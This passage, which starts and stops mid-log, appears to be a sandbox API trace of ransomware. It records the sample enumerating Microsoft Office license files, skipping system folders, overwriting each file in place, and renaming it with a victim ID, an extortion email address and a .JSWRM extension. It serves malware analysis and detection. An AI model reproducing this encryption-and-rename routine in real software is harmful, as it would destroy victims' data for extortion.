(HeapHandle=0x1e0000, Flags=0x0, Size=0x6c50) returned 0x24c1d0 [0105.796] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6c50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6c50, lpOverlapped=0x0) returned 1 [0105.800] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.800] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6c50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6c50, lpOverlapped=0x0) returned 1 [0105.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.800] CloseHandle (hObject=0x45c) returned 1 [0105.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0105.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0105.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0105.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0105.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0105.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.801] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0105.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0105.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.802] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe71ee503, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe71ee503, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe73de40e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d97, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", cAlternateFileName="O34625~1.XRM")) returned 1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.802] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0105.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0105.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0105.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0105.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0105.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0105.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0105.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.803] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11671) returned 1 [0105.803] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0105.803] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0105.919] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.919] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0105.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.919] CloseHandle (hObject=0x45c) returned 1 [0105.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0105.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0105.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0105.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0105.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0105.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.921] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0105.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0105.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.930] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7024919, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7024919, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe71c82f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bcf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription5-pl.xrm-ms", cAlternateFileName="O3B0CA~1.XRM")) returned 1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2=".") returned 1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2="..") returned 1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2="...") returned 1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2="windows") returned -1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2="recovery") returned -1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.930] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpString2="msocache") returned 1 [0105.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0105.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0105.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0105.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0105.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0105.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0105.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0105.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.938] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11215) returned 1 [0105.941] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0105.948] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.955] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.955] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.955] CloseHandle (hObject=0x45c) returned 1 [0105.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0105.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0105.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0105.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0105.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0105.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.956] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0105.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0105.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.957] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7155b4d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7155b4d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7345a77, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6c57, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription5-ppd.xrm-ms", cAlternateFileName="O3CB4F~1.XRM")) returned 1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2=".") returned 1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2="..") returned 1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2="...") returned 1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2="windows") returned -1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.957] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0105.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0105.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0105.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0105.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0105.958] HeapFree (in: hHeap=0x1e0000, 